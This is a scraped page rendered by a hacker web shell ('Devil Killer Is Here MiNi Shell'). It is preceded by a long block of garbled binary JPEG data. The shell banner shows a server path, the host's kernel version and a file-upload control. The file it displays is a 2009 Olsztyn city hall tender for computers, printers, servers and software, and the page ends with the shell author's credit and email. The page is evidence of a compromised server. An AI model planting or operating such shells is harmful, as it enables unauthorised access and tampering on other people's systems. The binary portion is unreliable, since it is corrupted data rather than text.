JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090309/47059-N-2009.html

<p class="kh_header"><b>Olsztyn: Zakup i dostarczenie sprzętu komputerowego oraz oprogramowania dla Urzędu Miasta w Olsztynie.</b><br>
<b>Numer ogłoszenia: 47059 - 2009; data zamieszczenia: 09.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Olsztyn , Plac Jana Pawła II Nr 1, 10-101 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5273111 w. 325, faks 089 5349375.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olsztyn.kei.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostarczenie sprzętu komputerowego oraz oprogramowania dla Urzędu Miasta w Olsztynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup i dostarczenie do siedziby Zamawiającego sprzętu komputerowego i urządzeń oraz oprogramowania w następującym asortymencie :
Część I : Sprzęt komputerowy, jednostki centralne, monitory, notebooki .
Jednostka centralna -  105 szt.
Monitor LCD 17 cali  80 szt.
Monitor LCD 19 cali -  25 szt.
Notebooki -  4 szt.
Część II : Drukarki, skanery, urządzenia wielofunkcyjne 
Drukarka laserowa dwustronnie drukująca -  19 szt.
Drukarka laserowa A4 -  8 szt.
Drukarka atramentowa kolorowa A3 -  10 szt.
Skaner A3 -  4 szt.
Skaner A4 -  3 szt.
Urządzenie wielofunkcyjne - 2 szt.
Część III : Serwery, moduły do switchy 
Serwer typu HP DL 380 G5 lub równoważny kompatybilny z 
serwerami posiadanymi przez Zamawiającego - 3 szt. 
Urządzenie nadawczo-odbiorcze (Transceiver) 4 Gb Short Wave 
Single Pack SFP do posiadanego urządzenia HP StorageWorks 4/8 SAN ( np. typu HP A7984A) - 8 szt.
Część IV : Oprogramowanie typu Vmware	Oprogramowanie VMware ( rozszerzenie licencji )
Część V : Oprogramowanie pozostałe:
ILO - oprogramowanie do zarządzania serwerami - 6 szt.
Subskrypcja na Web Filtering dla urządzenia Juniper Networks SSG550M (NS-WF-SSG550)
Rozszerzenie licencji do 16 portów dla przełącznika HP Storage-Works 4/8 SAN (HP A7984A)
Toad for Data Analysts - 1 szt.
Toad for Oracle Professional wraz z modułem DBA - 1 szt.
Toad for Data Modeler - 1 szt.
2. Wszystkie urządzenia objęte przedmiotem zamówienia muszą być fabrycznie nowe. Drukarki, skanery i urządzenia objęte częścią II zamówienia muszą być gotowe do pracy i wyposażone w tonery, developery i inne elementy niezbędne do prawidłowej pracy i korzystania ze wszystkich funkcji. Zamawiający dopuszcza zastosowanie w drukarkach tonerów lub tuszy startowych.
3. W przypadku sprzętu komputerowego objętego częścią I zamówienia, Zamawiający zastrzega sobie możliwość rozbudowy sprzętu bez konieczności wzywania serwisu Wykonawcy . 
4. Urządzenia objęte częścią I zamówienia muszą być gotowe do pracy, tzn. muszą posiadać zainstalowany system operacyjny z wszystkimi aktualizacjami, przy czym Zamawiający nie 	dopuszcza dostarczenia zestawów komputerowych z zainstalowanym systemem Windows Vista.
5. Wymagany jest przez Zamawiającego poziom hałasu urządzeń objętych częścią I ( jednostki centralne ) : poniżej 32 dB, zgodnie z normą ISO 9296. Przed podpisaniem umowy z wybranym Wykonawcą, Zamawiający wymagać będzie przedłożenia stosownych dokumentów potwierdzających spełnienie powyższego wymogu,
6. Oferowane urządzenia muszą posiadać następujące oznaczenia zgodności lub certyfikaty : CE ( na cały produkt ), EC ( certyfikat kompatybilności elektromagnetycznej ).
7. Zamawiający wymaga aby w przypadku, gdy siedziba Wykonawcy lub jego oddziału znajduje się poza terenem Olsztyna lub producent oferowanego sprzętu nie posiada autoryzowanego serwisu gwarancyjnego na terenie miasta Olsztyna został zapewniony serwis gwarancyjny w zakresie urządzeń objętych częścią I zamówienia na terenie miasta Olsztyna. Wykonawca zobowiązany będzie do zawarcia stosownej umowy z firmą znajdującą się na terenie miasta Olsztyna na świadczenie usług gwarancyjnych w zakresie urządzeń objętych częścią I zamówienia .
8. Szczegółowy opis przedmiotu zamówienia zawarty jest w SIWZ ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9, 30.21.40.00-2, 30.23.13.00-0, 30.23.21.00-5, 48.82.00.00-2, 38.52.00.00-6, 48.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W przypadku złożenia oferty na wszystkie części zamówienia ( I - V ) łączna wysokość wadium wynosi 9 200,00 zł. ( dziewięć tysięcy, dwieście złotych ) . Szczegółowy podział kwoty wadium na poszczególne części zamówienia określony został w rozdz. XIX SIWZ .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy:
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. Spełniają następujące warunki dodatkowe :
1) Wykonali z należytą starannością w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedno zamówienie polegające na jednorazowej dostawie sprzętu komputerowego ( zestawów komputerowych lub serwerów ) o całkowitej wartości zrealizowanej dostawy równej co najmniej 100 000 PLN ( z VAT).  Spełnienie w/w warunku wymagane jest tylko od Wykonawców ubiegających się o część I zamówienia . W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć wykaz zrealizowanych z należytą starannością dostaw sprzętu komputerowego ( zestawów komputerowych lub serwerów ) sporządzony według wzoru stanowiącego załącznik nr 2 do SIWZ oraz dokumenty potwierdzające, że dostawy te zostały wykonane należycie (opinie, referencje, protokoły itp.). W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony warunek musi być spełniony łącznie przez wszystkich Wykonawców.
2)  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia, tj.:
- posiadają aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę równą co najmniej 150 000 zł. Spełnienie w/w warunku wymagane jest tylko od Wykonawców ubiegających się o część I zamówienia . W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć aktualną polisę lub inny dokument ubezpieczenia potwierdzający, że jest on ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie Mniejszą niż 150 000 zł. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony warunek musi być spełniony łącznie przez wszystkich Wykonawców.
5. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 i 2 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - wg wzoru załącznik nr 3 do SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony warunek musi być spełniony przez każdego z Wykonawców.
6. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale VII SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Do oferty ( wypełnionego formularza ofertowego ) należy dołączyć następujące oświadczenia i dokumenty:
1) SPECYFIKACJE TECHNICZNE URZĄDZEŃ - wg zał. nr 1.1, 1.2, 1.3. do SIWZ .
Brak wyceny któregokolwiek z urządzeń objętych daną częścią zamówienia spowoduje odrzucenie oferty jako nie obejmującej całości przedmiotu zamówienia objętego daną częścią zamówienia. Dokument dotyczy tylko części : I, II, III zamówienia .
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, przedstawiające aktualny stan faktyczny i prawny, tj. w przypadku:
a) spółek prawa handlowego, przedsiębiorstw, spółdzielni i innych podmiotów zarejestrowanych w sądzie - odpis z rejestru sądowego (KRS),
b) spółek cywilnych - zaświadczenie o wpisie do ewidencji działalności gospodarczej (dotyczy każdego ze wspólników będących przedsiębiorcami),
c) osób fizycznych - zaświadczenie o wpisie do ewidencji o działalności gospodarczej.
Dokument wspólny dla wszystkich części .
3) Wykaz dostaw wykonanych przez Wykonawcę z należytą starannością w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wg wzoru zał. nr 2  do SIWZ. W wykazie musi być wymieniona co najmniej jedna należycie wykonana dostawa sprzętu komputerowego ( zestawów komputerowych lub serwerów ) o całkowitej wartości dostawy równej co najmniej 100 000 PLN (z VAT) .  Dokument dotyczy tylko części I  zamówienia .
4) Dokumenty potwierdzające należyte wykonanie dostaw wymienionych w wykazie (np. opinie, referencje, protokoły itp.). Dokument dotyczy tylko części I zamówienia .
5) Aktualna polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę równą co najmniej 150 000 zł. W/w dokument wymagany jest tylko od Wykonawców ubiegających się o część I zamówienia. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony dokument musi być złożony przez każdego Wykonawcę.Dokument dotyczy tylko części I zamówienia .
6)  Oświadczenie o nie podleganiu wykluczenia z postępowania o udzielenie zamówienia - wg wzoru załącznika nr 3 do SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymienione oświadczenie musi być złożone przez każdego z Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:www.bip.um.olsztyn.pl lub na pisemny wniosek może zostać wydana bezpłatnie w formie papierowej ..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2009 godzina 10:00, miejsce: Wydział Zamówień Publicznych Urząd Miasta Olsztyn, Pl. Jana Pawła II 1, 10 - 101 
Olsztyn pok. 402..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej ,
2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wraz z ofertą złożyć dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.  
3. W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej należy złożyć wraz z ofertą stosowne pełnomocnictwo (a).  
4. Otwarcie ofert jest jawne i nastąpi dnia 18.03.2009 r. o godz. 12:00 w siedzibie Zamawiającego w pok. 402 (sala konferencyjna).
5. Ze względu na specyfikę przedmiotu zamówienia całość niniejszego zamówienia nie może zostać powierzone podwykonawcom .
6. Termin wykonania zamówienia :
część I -	4 tygodnie
część II -	4 tygodnie
część III -	6 tygodni 
część IV -	4 tygodnie 
część V -	4 tygodnie 
7. Znak sprawy : ZP.G.3410-22/2009.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzęt komputerowy, jednostki centralne, monitory, notebooki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć I - Sprzęt komputerowy, jednostki centralne, monitory, notebooki . Szczegółowy opis zawarty jest w SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9, 30.21.40.00-2, 30.23.13.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drukarki, skanery, urządzenia wielofunkcyjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II -  	Drukarki, skanery, urządzenia wielofunkcyjne. Szczegółowy opis zawarty jest w SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.00-5, 38.52.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Serwery, moduły do switchy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Serwery, moduły do switchy. Szczegółowy opis zawarty jest w SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Oprogramowanie typu Vmware.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV- Oprogramowanie typu Vmware . Szczegółowy opis zawarty jest w SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Oprogramowanie pozostałe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V - Oprogramowanie pozostałe. Szczegółowy opis przedmiotu zamówienia zawarty jest w SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com